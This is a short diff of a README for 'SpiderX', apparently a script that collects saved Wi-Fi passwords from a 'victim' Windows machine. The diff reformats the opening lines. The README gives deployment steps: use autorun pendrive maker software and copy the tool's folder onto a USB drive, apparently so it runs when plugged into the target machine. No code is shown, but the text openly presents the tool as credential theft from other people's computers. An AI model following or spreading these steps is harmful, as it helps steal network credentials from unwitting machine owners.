mitesh092/SpiderX/README.md

 # SpiderX
-This Script Run for collecting past wifi passwords from Vistim windows machine.
-HOW TO RUN :
+This Script Run for collecting past wifi passwords from Vistim windows machine.\n HOW TO RUN :
 (Download Autorun pendrive maker Software)
 Step 1 : copy the directoty or folder (SpiderX) and paste into your pendrive.